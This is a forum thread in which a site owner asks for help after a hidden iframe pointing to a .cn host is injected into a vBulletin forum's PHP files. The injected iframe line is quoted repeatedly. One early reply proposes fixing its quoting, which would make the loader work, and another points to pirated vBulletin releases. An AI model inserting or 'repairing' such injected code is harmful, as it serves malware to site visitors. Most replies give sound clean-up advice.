index file error

Hon3Y

New Member
am getting index error on my ever site plz tell me ..wt to do

on my forum errror comes dis
Parse error: syntax error, unexpected \'<\' in /home/desiroot/public_html/Community/index.php on line 585

if i check the index file on that line it is like dis
<iframe src=\"http://thehomename.cn:8080/index.php\" width=196 height=153 style=\"visibility: hidden\"></iframe>
 

DOPE

New Member
<iframe src="http://thehomename.cn:8080/index.php" width="196" height="153" style="visibility: hidden"></iframe>

try changing that line to the above...
 

DOPE

New Member
Grinderhand said:
If you're finding a hidden iframe in your index file, you've probably been hacked.

That sucks. I've never heard of that, so even though this isnt my thread, THANKS for the new knowledge!
 

Grinderhand

New Member
Inspect all your site files. Look for "iframe" (without the quotes). The only place your should find that word in your files is in bbcode.php. If you find any infected files, replace them with fresh replacements from your original vb archive. Also look for any stray files you did not upload. Check every directory.

There are some more tips to secure your site here. But clean up the attack first, If you have any recent backups of your database, it might be a good idea to erase your current database and install the backup.
 

Hon3Y

New Member
am finding dis in all my script in the end how do i get rid
<iframe src=\"http://thehomename.cn:8080/index.php\" width=196 height=153 style=\"visibility: hidden\"></iframe>

plz explain me
 

Grinderhand

New Member
Replace them with fresh replacements from your original vb archive. After you do, check for other php files that are not part of vB or any mod you ever uploaded.
 

DOPE

New Member
You're better off reuploading all your folders and files in your vbulletin folder and reinstalling your forum. IMO
 

Hon3Y

New Member
i have reupload the vb folder but same error again

its b'cuz of ads..in that code it got iframe

need help urgent
 

Grinderhand

New Member
Check your own computer to make sure you're not re-infecting your site. Do a thorough virus/trojan scan. This may be where the re-infection is coming from.
 

Hon3Y

New Member
now i have download to my friend pc and then uploaded from it.. and still error coming

if i buy the license then dis errors gone?

am really upset by dis error
 

Grinderhand

New Member
A legit license would not help at all. You would have been hacked with legit, nulled or keygen.

Have you scanned your own machine thoroughly? Has your friend scanned his machine? If so, log into your cPanel and change your FTP password. Then re-upload ALL vB files along with ALL files associated with any mods your have installed.

If you are still infected after that, then either there is a stray file somewhere on your site that is doing the re-infection or you have SQL injection, in which case you may have to start all over from scratch unless you can cure the injection.
 
Hon3Y said:
am getting index error on my ever site plz tell me ..wt to do

on my forum errror comes dis
Parse error: syntax error, unexpected \'<\' in /home/desiroot/public_html/Community/index.php on line 585

if i check the index file on that line it is like dis
<iframe src=\"http://thehomename.cn:8080/index.php\" width=196 height=153 style=\"visibility: hidden\"></iframe>

It seems your forum has been hacked (firefox gave me warning for http://thehomename.cn), if you got backup replace your index file or remove that line.
 
Hon3Y said:
everyday i replace the index file .. i have to upload it again n again

It seems there's another backdoor in your forum, if it keeps recurring, its better to backup your database and upgrade to the latest using a vBTeam/GYSN or DGT vBulletin release.
 

Hon3Y

New Member
i have downloaded the databse ... and downloaded vb 3.8.3 frm vb

plz tell me that forum remains same as it is now ..
 
Hon3Y said:
i have downloaded the databse ... and downloaded vb 3.8.3 frm vb

plz tell me that forum remains same as it is now ..

You have nothing to lose, if its not working. You just make sure to backup ur database and run the upgrade, try it on localhost first if you can.
 
Top